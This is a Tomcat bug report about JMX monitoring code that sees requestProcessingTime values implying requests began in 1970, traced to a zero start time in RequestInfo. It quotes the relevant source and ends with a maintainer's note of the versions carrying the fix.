8: Total set time=1,289 ms. Average process time=64.450000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
9: Total set time=1,293 ms. Average process time=64.650000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
10: Total set time=1,287 ms. Average process time=64.350000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
All:
Fastest: 1,285 ms, Slowest: 1,293 ms, Average: 1,287.70 ms (64.385000 ms), StdDevP: 2.61 ms (0.20%)
Best 9: (excludes 9).
Fastest: 1,285 ms, Slowest: 1,291 ms, Average: 1,287.11 ms (64.355556 ms), StdDevP: 2.02 ms (0.16%)
Best 8: (excludes 7, 9).
Fastest: 1,285 ms, Slowest: 1,289 ms, Average: 1,286.63 ms (64.331250 ms), StdDevP: 1.58 ms (0.12%)
Best 7: (excludes 5, 7, 9).
Fastest: 1,285 ms, Slowest: 1,289 ms, Average: 1,286.29 ms (64.314286 ms), StdDevP: 1.39 ms (0.11%)
Since the new code shows ~31.5ms compared to the old code's ~63.3ms, I can confidently claim it is now twice as fast!
Whilst writing this code, I was especially interested in ensuring that calls to the methods on QuickDivideInfo got inlined for speed. I don't know a way to easily check the JIT output so I relied on timings of test cases. I wrote three tests for each method: one to time the normal operation (divide or modulo), one to put the multiplication and shift actually inline, and one to call the QuickDivideInfo method. If the latter two produced roughly equal times, then the method was assumed to have been inlined. Both should also produce times roughly one third of that method using the normal operator.
I was surprised when one of the sets produced funny results. At first I thought my method was not being inlined but then I noticed that the test with the physically inlined optimization was also not showing the expected speed up!
This code:
var check = 0;
for (var numerator = 0; numerator <= maxNumerator; numerator++)
{
check += numerator >= 0
? numerator - (int) ((numerator * qdi.Multiplier) >> qdi.Shift) * qdi.Divisor
: numerator - (int) -((-numerator * qdi.Multiplier) >> qdi.Shift) * qdi.Divisor;
}
return check;
ran 3 times faster than this code:
var check = 0;
for (var numerator = 0; numerator <= maxNumerator; numerator++)
{
check += numerator >= 0
? (int) ((numerator * qdi.Multiplier) >> qdi.Shift)
: (int) -((-numerator * qdi.Multiplier) >> qdi.Shift);
}
return check;
yet it had more operations to complete!
I eventually discovered that I could get the the expected speed increase back by either inverting the condition to be '<0' or by changing to a if/else construct (with either condition).
<0
if
else
So out of the 4 ways of writing the expression, 3 produced fast JITed code but the other, the one I happened to have chosen, produced slow JITed code.
So my conclusion is that there isn't a bug as such in the JIT-compiler since the results were correct but there is definitely something that could be improved. And it has made me a little uneasy about using ?: in performance-critical code.
?:
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
S<T>::f(U) // Out of line.
SimmoTech wrote:Although the code does a '-= 4' in the loop, the pointers are integers so are four bytes each and it uses indexers [0] and [1] so all chars are actually included.
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Articles/192371/UniqueStringList-Revisited | CC-MAIN-2016-18 | refinedweb | 5,192 | 56.25 |
Is there a command available for use with key bindings for the action “Close Other Tabs”?
Thanks for any insights you have!
Is there a command available for use with key bindings for the action “Close Other Tabs”?
Thanks for any insights you have!
The command for that is
close_others_by_index, but it requires you to provide the
group that the file is in (the visible pane in the layout) as well as the
index into that group, so that the command knows what tabs it should be closing. That makes binding the command to a key problematic because the
group and
index will vary.
You could use a plugin like the following, which implements a
close_other_tabs command that captures the appropriate
group and
index and calls that command for you, though. To use it, use
Tools > Developer > New Plugin... from the menu, then replace the stub with the plugin code and save it as a
.py file in the location that Sublime defaults to.
import sublime import sublime_plugin class CloseOtherTabsCommand(sublime_plugin.TextCommand): """ Tells the window to close all other views that share the same group in the layout as the current file. """ def run(self, edit): group, index = self.view.window().get_view_index(self.view) self.view.window().run_command("close_others_by_index", { "group": group, "index": index }) | https://forum.sublimetext.com/t/keyboard-shortcut-for-close-other-tabs/43512 | CC-MAIN-2019-18 | refinedweb | 213 | 73.78 |
ezLCDuino Backpack
- patrickmccabe's blog
- Login or register to post comments
- by patrickmccabe
- Collected by 3 users
June 26, 2011.
Price is $20 for a full kit without a LCD and $25 for a full kit WITH a 16x2 LCD. (plus $5 shipping in the USA). A kit consists of everything you will need to assemble which includes a PCB, caps, resistors, transistor, resonator, trim pot, IC socket, Atmega 328 with Arduino Bootloader, and 40 breakaway male headers. Like I said before, for an extra $5 ($25 total) you get a LCD too. It is a white on blue LCD.
Update 07.15.11
Well the PCB are here and I have assembled and tested one.
Some labeled resistors and notice the polarity of the electrolytic cap. The sqaure pad is positive, that is the one on the left in the photo below.
V1.2
There are resistors on the UART pins to allow users to program the Arduino without unplugging what they have connected the TX and RX lines. There is an added 10uf cap. A transistor allows the backlight to be turned on and off or PWMed from pin 9.
V1.1
Added more power connections on the communication row so the board can be interfaced to using a 4 or 3 pin cable depending on if you are using I2C or using serial with just RX or with TX as well.
V1.0
This is my ezLCDuino Backpack. It is an Arduino LCD backpack. This will solder on directly onto the back of a LCD allowing you to control it using the Arduino LCD library.
Features:
- FTDI programming port
- I2C communication pins
- Serial communication pins (hardware and software)
- Trim pot for adjusting the LCD contrast
- Arduino Atmega 328
- 4 spare Analog pins (not including the ones used for I2C communication)
- 3 spare digital pins (not including the ones used for serial communication)
- PWM control of the backlight
- Resistors allow the Arduino to be programmed without unplugging devices connected to the TX and RX pinscontroller in your project that contains a LCD, or use it as a slave to control the LCD in your project and provide extra pins and processing power.
I will order some PCBs this week and get them in people's hands soon. Tell me what you think.
This is a bit embarrassing...
Oh geeze, I can't believe I am asking this...
How do I receive a string and print it on the LCD? --In my defense, I am just a little rusty on the ol' Arduino, and I am missing something pretty simple, I would assume.
My little system works, all my "commands" work, but when the string I receive is displayed on the LCD, I am getting one of those silly rectangular boxes in front of the "H" in my "Hello World". Where the heck is this extra character coming from? It shouldn't be the "T" qualifier, that should have been "eaten up" with the first Serial.read. I'm stumped.
Embarrassing...
#include <LiquidCrystal.h>
#define backlight 9
int RxData;
int X;
int Y;
boolean scrollOn=false;
long previousMillis = 0;
long interval = 250;
LiquidCrystal lcd(11, 12, 5, 4, 3, 2);
void setup()
{
Serial.begin(115200);
pinMode(backlight, OUTPUT);
analogWrite(backlight, 200);
lcd.begin(16, 2);
}
void loop()
{
unsigned long currentMillis = millis();
if (Serial.available()>0) // command available
{
int qualifier=Serial.read();
switch (qualifier)
{
case 'C':
lcd.clear();
break;
case 'H':
lcd.home();
break;
case 'I':
lcd.display();
break;
case 'O':
lcd.noDisplay();
break;
case 'L':
if (scrollOn)
{
scrollOn=false;
}else{
scrollOn=true;
}
break;
case 'B':
RxData=Serial.read();
analogWrite(backlight, RxData);
break;
case 'S':
X=Serial.read();
Y=Serial.read();
lcd.setCursor(X,Y);
break;
case 'T':
do
{
RxData = Serial.read(); //read Serial
lcd.print(RxData,BYTE); //prints the character just read
}while (Serial.available());
}
Serial.flush();
}
if (scrollOn)
{
if(currentMillis - previousMillis > interval) {
previousMillis = currentMillis;
lcd.scrollDisplayLeft();
}
}
}
CtC, You are doing a
CtC, You are doing a Serial.read() without checking if a character has been available. Serial.read() is non blocking, will return -1 if no character is available.
Funny thing , I have done the same mistake, when I test your secret program.
So,
The following line:
lcd.print(RxData,BYTE); //prints the character just read
Could be:
if RxData > -1 {
lcd.print(RxData,BYTE); //prints the character just read
}
There might be an else required to clean the code up?
Yeah, I just tested this on
Yeah, I just tested this on mine and that was the problem. Should fix it for CTC.
Awesome
Awesome product, and a great price compared to other products.
Definalt will look at getting one when i get paid :P
Just out of curiosity, where do you get your LCDs from at that price?
Ebay, the ultimate supplier.
Ebay, the ultimate supplier.
Haha Nice. I have to agree
Haha Nice. I have to agree :P ( they are the best place for SMD resistors and caps!)
Got Mine!
Thanks Pat
Thats a good looking PCB
Great job with the PCB looks good. Looks even better with the LCD module... :)
I was wondering which CAD tool you used to design it.
Got the boards done from seeed studio...?
I use the free version
I use the free version of EagleCAD
Yup, I had them made at Seeedstudio. | http://letsmakerobots.com/node/27547 | CC-MAIN-2014-23 | refinedweb | 883 | 65.93 |
Alexey Dobriyan wrote:>> Again, so to checkpoint one task in the topmost pid-ns you need to>> checkpoint (if at all possible) the entire system ?!> > One more argument to not allow "leaks" and checkpoint whole container,> no ifs, buts and woulditbenices.> > Just to clarify, C/R with "leak" is for example when process has separate> pidns, but shares, for example, netns with other process not involved in> checkpoint.> > If you allow this, you lose one important property of checkpoint part,> namely, almost everything is frozen. Losing this property means suddenly> much more stuff is alive during dump and you has to account to more stuff> when checkpointing. You effectively checkpointing on live data structures> and there is no guarantee you'll get it right.Alexey, we're entirely on par about this: everyone agrees that if youwant the maximal guarantee (if one exists) you must checkpoint entirecontainer and have no leaks.The point I'm stressing is that there are other use cases, and otherusers, that can do great things even without full container. And mygoal is to provide them this capability. Specially since the mechanismis shared by both cases.> > Example 1: utsns is shared with the rest of the world.> > utsns content is modifiable only by tasks (current->nsproxy->uts_ns).> Consequently, someone can modify utsns content while you're dumping it> if you allow "leaks".> > Did you take precautions? Where?> > static int cr_write_utsns(struct cr_ctx *ctx, struct uts_namespace *uts_ns)> {> struct cr_hdr h;> struct cr_hdr_utsns *hh;> int domainname_len;> int nodename_len;> int ret;> > h.type = CR_HDR_UTSNS;> h.len = sizeof(*hh);> > hh = cr_hbuf_get(ctx, sizeof(*hh));> if (!hh)> return -ENOMEM;> > nodename_len = strlen(uts_ns->name.nodename) + 1;> domainname_len = strlen(uts_ns->name.domainname) + 1;> > hh->nodename_len = nodename_len;> hh->domainname_len = domainname_len;> > ret = cr_write_obj(ctx, &h, hh);> cr_hbuf_put(ctx, sizeof(*hh));> if (ret < 0)> return ret;> > ret = cr_write_string(ctx, uts_ns->name.nodename, nodename_len);> if (ret < 0)> return ret;> > ret = cr_write_string(ctx, uts_ns->name.domainname, domainname_len);> return ret;> }> > You should take uts_sem.Fair enough. Will fix :)However, even with leaks count you need the uts_sem, because it ifthis is shared by another task when you start the checkpoint, butnot shared by the time you do the leak check - then you missed it.And then, even the semaphore won't work unless you keep it for theentire duration of the checkpoint: if task A and B inside thecontainer both know something about the UTS contents, and task Coutside modified it before the checkpoint was taken, then, at leastpotentially, we have an inconsistency that neither you or I detect.The best part of it, however, it is unlikely that either A or Bwould ever *care* about that, especially in the case of UTS.And that brings me to the moral: in so many cases the user will livehappily ever after even if the UTS is changes 50 times during thecheckpoint. Because her tasks don't care about it.Remember that "flexibility" argument in my first post to this thread:the next step is that the user can say "cradvise(UTS, I_DONT_CARE)":during checkpoint the kernel won't save it, during restart the kernelwon't restore it. Voila, so little effort to make people happy :)> > > Example 2: ipcns is shared with the rest of the world> > Consequently, shm segment is visible outside and live. Someone already> shmatted to it. What will end up in shm segment content? Anything.This is another excellent example. You are _so_ right that it doesn'tmake much sense to try to restart a program that relies on somethingthat isn't part of the checkpoint.And yet, there are a handful programs, applications, processes thatdo not depend on the outside world in any important way, tasks thatfrankly, my dear, don't give a ...> > You should check struct file refcount or something and disable attaching> while dumping or something.Yes, yes, yes !But -- when you focus solely on the full-container-only case.Deciding what's best for the users is a two-edged-sword. It workswell to achieve foolproof operation with the less knowledgeable,but it's a bit of an arrogant approach for the more sophisticatedones.If you limit c/r to a full-container-only, you take away a freedomfrom the users - you take away a huge opportunity to use the c/rto its full potential. And you have this extra functionality fornearly free ! It's like giving the user a full blown linux laptopbut disallowing use of the command line :p> > Moral: Every time you do dump on something live you get complications.> Every single time."while(1);" will never have complications... :)And seriously, yes, you can bring endless examples of when it won'twork. And others will bring their examples of when it will be okeven with "complications", because if you don't care about certainstuff, the "complication" becomes void.We can always restrict c/r later, either by code, or privileges, orsystem config, sysadmin policy, flag to checkpoint(2), you name it.So those who seek general case guarantee are happy. Why do it a-prioriand block all other users ? is it of everyone's best interest todecide now that no-one should ever do so ?Oren.> > > There are sockets and live netns as the most complex example. I'm not> prepared to describe it exactly, but people wishing to do C/R with> "leaks" should be very careful with their wishes.> | https://lkml.org/lkml/2009/4/15/446 | CC-MAIN-2018-13 | refinedweb | 891 | 64.1 |
#include <GList.h>
#include <GList.h>
Inheritance diagram for GList:
"List"
Constructor.
-1
Adds a preexisting column to the control.
50
Adds a column to the list.
Get the display mode.
true
Insert a list of item.
Inserts the item 'p' at index 'Index'.
[virtual]
Called when a column is clicked.
[inline, virtual]
Called when a column is dragged somewhere.
Called when the column is dropped to a new location.
Called when the user selects an item and starts to drag it.
Called when an item is clicked.
Called when the user selects an item. If multiple items are selected in one hit this is only called for the first item. Use GetSelection to get the extent of the selected items..
Called every so often by the timer system.
Reimplemented from GView.
Set the display mode.
Sort the list. | http://www.memecode.com/lgi/docs/classGList.html | crawl-001 | refinedweb | 139 | 81.09 |
example:
import "dart:async"; import "dart:io"; import "package:build_tools/build_shell.dart"; import "package:build_tools/build_tools.dart"; Future main(List args) async { target("default", ["breakfast"], (t, args) { print("Very good!"); }); target("breakfast", ["eat sandwich", "drink coffee"], (t, args) { print(t.name); }); target("drink coffee", ["make coffee"], (t, args) { print(t.name); }); target("eat sandwich", ["make sandwich"], (t, args) { print(t.name); }); target("make coffee", [], (t, args) { print(t.name); }); target("make sandwich", ["take bread", "take sausage"], (t, args) { print(t.name); }); target("take bread", [], (t, args) { print(t.name); }); target("take sausage", [], (t, args) { print(t.name); }); exit(await new BuildShell().run(args)); }
Output:
take bread take sausage make sandwich eat sandwich make coffee drink coffee breakfast Very good!
Short list of features:
Targets (tasks)
The targets describes the tasks and their dependencies (sources).
target("build", ["compile", "link"], (Target t, Map args) { // build after compile and link }); %.cc => %.obj });
rules(["%.html", "%.htm"], ["%.md"], (Target t, Map args) { // transform %.html => %.md // transform %.htm => %.md });
Hooks
The hooks allows specifying the target actions that will be performed
before or
after target actions.
after(["git:commit"], (Target t, Map args) { // action });
before(["compile", "link"], (Target t, Map args) { // action });
Build shell
The built-in
build shell allows use the build scripts as command line scripts.
exit(await new BuildShell().run(args)); | https://www.dartdocs.org/documentation/build_tools/0.0.11/index.html | CC-MAIN-2017-47 | refinedweb | 218 | 61.63 |
.
What is the up-to-date way to install pip on windows?
-- Outdated -- use distribute, not setuptools as described here. --
As you mentioned pip doesn't include an independent installer, but you can install it easily with its predecessor easy_install.
So:
C:\Python2x\folder (don't copy the whole folder into it, just the content), because python command doesn't work outside
C:\Python2xfolder and then run:
python setup.py install
C:\Python2x\Scriptsto the path
You are done.
Now you can use
pip install package to easily install packages as in Linux :)
As I sometimes have path problems, where one of my own cmd scripts is hidden (shadowed) by another program (earlier on the path), I would like to be able to find the full path to a program in Windows, given just its name.
Is there an equivalent to the UNIX command 'which'?
On UNIX,
which command prints the full path of the given command to easily find and repair these shadowing problems.
Windows Server 2003 and later provide the
WHERE command.
What.
It's certainly possible to develop on a Windows machine, in fact my first application was exclusively developed on the old Dell Precision I had at the time :)
There are two routes;
The first route requires modifying (or using a pre-modified) image of Leopard that can be installed on a regular PC. This is not as hard as you would think, although your success/effort ratio will depend upon how closely the hardware in your PC matches that in Mac hardware - e.g. if you're running a Core 2 Duo on an Intel Motherboard, with a NVidia graphics card you are laughing. If you're running an AMD machine or something without SSE3 it gets a little more involved.
If you purchase (or already own) a version of Leopard then this is a gray area since the Leopard EULA states you may only run it on an "Apple Labeled" machine. As many point out if you stick an Apple sticker on your PC you're probably covered.
The second option is the more costly. The EULA for the workstation version of Leopard prevents it from being run under emulation and as a result there's no support in VMWare for this. Leopard server however CAN be run under emulation and can be used for desktop purposes. Leopard server and VMWare are expensive however.
If you're interested in option 1) I would suggest starting at Insanelymac and reading the OSx86 sections.
I do think you should consider whether the time you will invest is going to be worth the money you will save though. It was for me because I enjoy tinkering with this type of stuff and I started during the early iPhone betas, months before their App Store became available.
Alternatively you could pickup a low-spec Mac Mini from eBay. You don't need much horse power to run the SDK and you can always sell it on later if you decide to stop development or buy a better Mac.
I was looking into Valgrind to help improve my C coding/debugging when I discovered it is only for Linux - I have no other need or interest in moving my OS to Linux so I was wondering if there is a equally good program for Windows.
As jakobengblom2 pointed out, valgrind has a suit of tools. Depending which one you are talking about there are different windows counter parts. I will only mention OSS or free tools here.
1.. Download::
I can't seem to get the icons to display under Windows 7 and I really miss this from Windows XP.
How can it be fixed?
Windows_"'s prefixed to the ones you don't need). The TortoiseSVN Shell extensions are nicely named so you know what they do, the TortoiseCVS extensions are not. After looking through the source code, I found the pertinent information:
I have written a simple Java class to generate the hash values of the Windows Calculator file. I am using
Windows 7 Professional with SP1. I have tried
Java 6.0.29 and
Java 7.0.03. Can someone tell me why I am getting different hash values from Java versus (many!) external utilities and/or websites? Everything external matches with each other, only Java is returning different results.
import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.util.LinkedHashMap; import java.util.Map; import java.util.Map.Entry; import java.util.zip.CRC32; import java.security.DigestInputStream; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; public class Checksum { private static int size = 65536; private static File calc = new File("C:/Windows/system32/calc.exe"); /* C:\Windows\System32\calc.exe (verified via several different utilities) ---------------------------- CRC-32b = 8D8F5F8E MD5 = 60B7C0FEAD45F2066E5B805A91F4F0FC SHA-1 = 9018A7D6CDBE859A430E8794E73381F77C840BE0 SHA-256 = 80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22 SHA-384 = 551186C804C17B4CCDA07FD5FE83A32B48B4D173DAC3262F16489029894FC008A501B50AB9B53158B429031B043043D2 SHA-512 = 68B9F9C00FC64DF946684CE81A72A2624F0FC07E07C0C8B3DB2FAE8C9C0415BD1B4A03AD7FFA96985AF0CC5E0410F6C5E29A30200EFFF21AB4B01369A3C59B58 Results from this class ----------------------- CRC-32 = 967E5DDE MD5 = 10E4A1D2132CCB5C6759F038CDB6F3C9 SHA-1 = 42D36EEB2140441B48287B7CD30B38105986D68F SHA-256 = C6A91CBA00BF87CDB064C49ADAAC82255CBEC6FDD48FD21F9B3B96ABF019916B */ public static void main(String[] args)throws Exception { Map<String, String> hashes = getFileHash(calc); for (Map.Entry<String, String> entry : hashes.entrySet()) { System.out.println(String.format("%-7s = %s", entry.getKey(), entry.getValue())); } } private static Map<String, String> getFileHash(File file) throws NoSuchAlgorithmException, IOException { Map<String, String> results = new LinkedHashMap<String, String>(); if (file != null && file.exists()) { CRC32 crc32 = new CRC32(); MessageDigest md5 = MessageDigest.getInstance("MD5"); MessageDigest sha1 = MessageDigest.getInstance("SHA-1"); MessageDigest sha256 = MessageDigest.getInstance("SHA-256"); FileInputStream fis = new FileInputStream(file); byte data[] = new byte[size]; int len = 0; while ((len = fis.read(data)) != -1) { crc32.update(data, 0, len); md5.update(data, 0, len); sha1.update(data, 0, len); sha256.update(data, 0, len); } fis.close(); results.put("CRC-32", toHex(crc32.getValue())); results.put(md5.getAlgorithm(), toHex(md5.digest())); results.put(sha1.getAlgorithm(), toHex(sha1.digest())); results.put(sha256.getAlgorithm(), toHex(sha256.digest())); } return results; } private static String toHex(byte[] bytes) { String result = ""; if (bytes != null) { StringBuilder sb = new StringBuilder(bytes.length * 2); for (byte element : bytes) { if ((element & 0xff) < 0x10) { sb.append("0"); } sb.append(Long.toString(element & 0xff, 16)); } result = sb.toString().toUpperCase(); } return result; } private static String toHex(long value) { return Long.toHexString(value).toUpperCase(); } }
Got it. The Windows file system is behaving differently depending on the architecture of your process. This article explains it all - in particular:.
Try copying
calc.exe to somewhere else... then run the same tools again. You'll get the same results as Java. Something about the Windows file system is giving different data to the tools than it's giving to Java... I'm sure it's something to do with it being in the Windows directory, and thus probably handled "differently".
Furthermore, I've reproduced it in C#... and found out that it depends on the architecture of the process you're running. So here's a sample program:
using System; using System.IO; using System.Security.Cryptography; class Test { static void Main() { using (var md5 = MD5.Create()) { string path = "c:/Windows/System32/Calc.exe"; var bytes = md5.ComputeHash(File.ReadAllBytes(path)); Console.WriteLine(BitConverter.ToString(bytes)); } } }
And here's a console session (minus chatter from the compiler):
c:\users\jon\Test>csc /platform:x86 Test.cs c:\users\jon\Test>test 60-B7-C0-FE-AD-45-F2-06-6E-5B-80-5A-91-F4-F0-FC c:\users\jon\Test>csc /platform:x64 Test.cs c:\users\jon\Test>test 10-E4-A1-D2-13-2C-CB-5C-67-59-F0-38-CD-B6-F3-C9\...) | http://boso.herokuapp.com/windows | CC-MAIN-2017-26 | refinedweb | 1,253 | 50.84 |
Liferay DXP DXP was developed for easy customization, meaning it components you want to customize.
This tutorial demonstrates finding an extension point. It steps through a simple example that locates an extension point for importing LDAP users. The example includes using Liferay DXP’s Application Manager and Felix Gogo Shell.
Locate the Related Module and Component
First think of words that describe the application behavior you want to change. The right keywords can help you easily track down the desired module and its component. Consider the example for importing LDAP users. Some candidate keywords for finding the component are import, user, and LDAP.
The easiest way to discover the module responsible for a particular Liferay feature is found in the Liferay Foundation app suite’s list of apps and features. Select the app suite. use. This tutorial assumes you’re using the Gogo shell. services the component references. They for customizing the LDAP user
import process! tutorial
here.
Important Not all Liferay extension points are available as referenced services. Service references are common in Declarative Services (DS) components, but extension points can be exposed in other ways too. Here’s a brief list of other potential extension points in Liferay DXP:
-! In the App Manager, you used keywords to find the module component whose behavior you wanted to change. Then you used Gogo shell to find the component extension point for implementing your customization. | https://help.liferay.com/hc/en-us/articles/360017884232-Finding-Extension-Points | CC-MAIN-2022-27 | refinedweb | 234 | 50.02 |
#!/usr/bin/perl -w
use strict; my $me;
my $bonnie = "lies_over_the_ocean"; {
my $bonnie = "lies_over_the_sea"; {
my $bonnie = "lies_over_the_ocean"; {
0; bring_back(my $bonnie = 2, $me); {
bring_back(
bring_back(
0, bring_back(my $bonnie = 2, $me, 2, $me )));{
bring_back(
bring_back(
0, bring_back(my $bonnie = 2, $me )))}}}}}
sub bring_back {
print "brought back my bonnie!\n" if @_ == 5;
return ("",@_);
}
[download]
One suggestion; if you turn on warnings with -w instead of use warnings, your poem will run under 5.005 too. :)
I'm curious... Could you share your thought process as you wrote this?
I've looked at Writing highly obfuscated code in Perl, but most of the tips* found in that node are not demonstrated in this snippet. Some obfuscations demonstrate a certain level of style and creativity; yours is one example.
* I would say most of those tips, used alone and without creativity, would in fact be nothing more than cheap tricks. Not unlike playing a musical instrument well technically, but without making any music.
I started with the mere idea that I wanted to write "My Bonnie Lies Over the Ocean" as a perl poem, and just tried my hardest to force the poem to be syntactically valid. I will admit that it turned out better than I expected. Here's a collection of thoughts that might help to explain how it got into its final form.
I started with:
my $bonnie = "lies_over_the_ocean";
my $bonnie = "lies_over_the_sea";
my $bonnie = "lies_over_the_ocean";
[download]
The 0; before the first bring_back() is simply a no-op. It's there because the actual song contains the word "oh" at that point.
I noticed that the words "bring back" are used repeatedly throughout the song, and made an analogy between lyrics and code. As a rule, oft-used pieces of code should be stuck within a function. Hence, I created a bring_back() function and called it repeatedly.
It just "worked out" to have nested calls to bring_back(), since that fits the flow of the actual song. The calls to bring_back() have the added advantage of setting up new scopes such that I can declare $bonnie again.
The 0,'s within the function calls continue the tradition set up earlier; they use the number 0 to represent the phonetic "oh"'s that are present in the real song, while keeping the code syntactically valid.
I called each bring_back() with whatever arguments fit the song.
At this point, I created an empty sub bring_back {} that did nothing, and thought my work was done.
I then decided it would be nice for the poem to actually output something, and decided that bring_back() should be the place to do it.
The obvious problem was getting the output to print only once, since bring_back() gets called 7 times.
I decided I'd use the number of arguments passed to bring_back() as the criteria for printing, and simply toyed with bring_back()'s return value until I got a unique number of arguments passed (5) on the last | http://www.perlmonks.org/index.pl?node=my%20%24bonnie | CC-MAIN-2015-35 | refinedweb | 492 | 67.38 |
07-13-2012 03:01 PM
I'm following the instructions on this page to set up my environment:
I'm also using my saved signing keys but whenever I try to load an app on my device or go into the Bar Signer option I get the following error:
"Error loading certificate: java.io.IOException: subject key, java.security.InvalidKeyException: Invalid EC key"
The software can't create a debug token either, seems to happen whenever the program tries to create a Debug Token, I've cleared the debug token off of my devices as well.
07-20-2012 07:52 PM
I have the same problem with a certificate created by the same tool in January 2012. I can create a new certificate without a problem, but get the "Invalid EC key" message with the old one.
08-30-2012 07:15 AM
I have the same issue. When trying to deploy an Android app to PlayBook I get prompted to create a new debug token, when I click OK I get the following error:
Error loading certificate: java.io.IOException: subject key,
java.security.InvalidKeyException: Invalid EC Key
Reason:
Error loading certificate: java.io.IOException: subject key,
java.security.InvalidKeyException: Invalid EC Key
Anyone got a workaround?
08-30-2012 09:08 AM
I found that if you use the Momentics IDE then it works fine, but I imagine for most Android developers they won't have this installed so I have a solution which involves creating a debug token from the command line.
1. First find where your developer certificate and keys are located, this is usually:
C:\Users\<username>\AppData\Local\Research In Motion
You should have the following files in there:
author.p12
barsigner.csk
2. Open a command prompt and cd to your BlackBerry tools/bin directory. You can find this by right clicking on your project in Eclipse and going to BlackBerry Tools->Configure targets, then clicking on BlackBery Tools SDK. On my machine it is:
C:\eclipse\plugins\net.rim.ajde_1.2.0.201207131336
3. Run the following command:
blackberry-debugtokenrequest -cskpass <CSKpassword> -keystore <Your P12 Developer Certificate> -storepass <Certificate Password> -deviceId <Your Blackberry Playbook Device ID in hex format (eg 0x29D91835)> <Output Debug BAR file name, example.bar>
This should create you a debug token
4. Now go back into eclipse BlackBerry Tools -> Configure targets. Click on Debug Token Details->Import, specify your newly created debug token.
That's it, your debug token should be installed on the device.
09-24-2012 07:06 AM
Hi!
I am trying to set the volume of BB Playbook in android through audio manager using SeekBar but the volume of device is not changing. however if i try to get the current volume of system (BB Palybook) it shows me the correct volume but when i try to set the volume through seekBar it did not works. here is my code :
import android.media.AudioManager;
this is the import for audioManager
AudioManager audioManager;
this is the audioManager variable) {
// TODO Auto-generated method stub
audioManager.setStreamVolume(AudioManager.STREAM_M
}
});
Please if anyone have solution to this problem. what i think that this happens due to BB security restrictions. Is that so??
09-24-2012 02:56 PM
The instructions are not working for me on step 3 blackberry-debugtokenrequest. I really spent about a hour trying to make this work!
1. I get an Error: No devices specified
It's not clear where you get the Device ID. In the PlayBook About dialog the "BlackBerry ID" is my email address (not Hex). This generates an error. Next I tried to use the Hardware Device PIN (8 hex digits). I’ve tried this 8 digit hex number both with and without “0x” prefix. I’ve also included the full path and filename author.p12 in quotes (since there are spaces in the directories.
How to you find the Hex device ID? A Google search didn't turn up anything useful. If this is the Hardwrare Device PIN, any other ideas what may be going wrong? I've reviewed the line very carefully for the correct spaces, etc.
2. Any hope this bug (java.io.IOException) will be fixed so you don't have to go through all this manual work? The Eclipse BlackBerry Deployment Setup Wizard used to do all this work for us, but it no longer works.
09-24-2012 06:16 PM
Ok, I solved this. A copy of the commands I first put in Word (to keep track of what I was doing) changed a dash to an em-dash! It was not at all obvious!
Also the Device ID is found in the PlayBook at Settings, About. Switch the top option from "General" to "Hardware". The first line "PIN" is the device id in hex.
If you're having problems, here's a clearer example of how it should look (with the passwords set to "myPassword" and user name changed to "MyName", and deviceid set to 1234ABCD:
blackberry-debugtokenrequest -cskpass myPassword -keystore "C:\Users\MyName\AppData\Local\Research In Motion\author.p12" -storepass myPassword2 -deviceid 0x1234ABCD debugtok.bar
02-20-2013 05:19 PM
my example
blackberry-debugtokenrequest -cskpass ******* -keystore "C:\bb10beta4\host_10_0_9_284\win32\x86\usr\bin\au
02-21-2013 01:16 PM - edited 02-21-2013 01:18 PM
I've created a batch script to create my debug tokens. Thought I'd share it:
set LOCAL_DATA_PATH="c:\Users\<your_username>\AppData\
LocalLocal
Insert your own details and save this as create-debugtoken.bat in your BlackBerry tools folder, on my machine this is:
c:\eclipse\plugins\net.rim.ajde_1.5.1.201301180815
Now just run the batch file and your debugtoken will be created in your LOCAL_DATA_PATH folder.
Note you can easily get your Device PIN from within eclipse by doing Preferences->BlackBerry->BlackBerry Tools SDK->Bar Signer then under 'Debug tokens' click 'Create...' then 'Add' then 'Autodiscover'
03-02-2013 11:21 AM
I was getting the same Exception in Eclipse, but managed to resolve the problem by forcing Eclipse to run using Java 6 rather than Java 7.
In my eclipse.ini I added the line
-vm
C:\Program Files\Java\jdk1.6.0_41\bin\javaw.exe | http://supportforums.blackberry.com/t5/Android-Runtime-Development/Error-Loading-Certificate-Java-io-IOException/m-p/1918505 | CC-MAIN-2014-10 | refinedweb | 1,040 | 56.45 |
We have an application that periodically monitors JMX "Catalina:type=RequestProcessor,worker=*,name=*" and looks at each entry returned from that wildcard, getting requestProcessingTime. e.g., code with lines like this:
ObjectName requestProcessorWildcard = new ObjectName("Catalina:type=RequestProcessor,worker=*,name=*");
Set<ObjectName> mbeans = mbs.queryNames(requestProcessorWildcard, null);
for (ObjectName name : mbeans) {
// Get "processing time" for the current request, if any
long currentReqProcTime = getLongValue(mbs, name, "requestProcessingTime") / 60000;
We sometimes see requestProcessingTime returning a value suggesting the request started on 1-1-1970, currently 46+ years ago. Looking at Tomcat 7.0.57 source code (as what I have available to look at), I see this method in java/org/apache/coyote/RequestInfo.java:
public long getRequestProcessingTime() {
if ( getStage() == org.apache.coyote.Constants.STAGE_ENDED ) return 0;
else return (System.currentTimeMillis() - req.getStartTime());
}
Clearly, if req.getStartTime() == 0, this method will return a nonsensical request processing time. This method ought to make sure the start time isn't zero before doing the subtraction. When we see this, the request processor reports itself to be in stage 3 ... aka "STAGE_SERVICE". Clearly the requests weren't started in 1970. We don't know how the request is in the stage "service" but has its start time zeroed.
Note that the person in this thread was probably experiencing the same flaw. If you do the math 1466499689496 msec corresponds to the time span from 1-1-70 to Tue, 21 Jun 2016 09:01:29.496 GMT ... and the EMail was posted on 21 June 2016! I haven't followed the code through to see what can cause this to occur.
I can see a few ways this can happen. I'll look at making that code more robust.
This has been fixed in the following branches:
- 9.0.x for 9.0.0.M11 onwards
- 8.5.x for 8.5.6 onwards
- 8.0.x for 8.0.38 onwards
- 7.0.x for 7.0.73 onwards
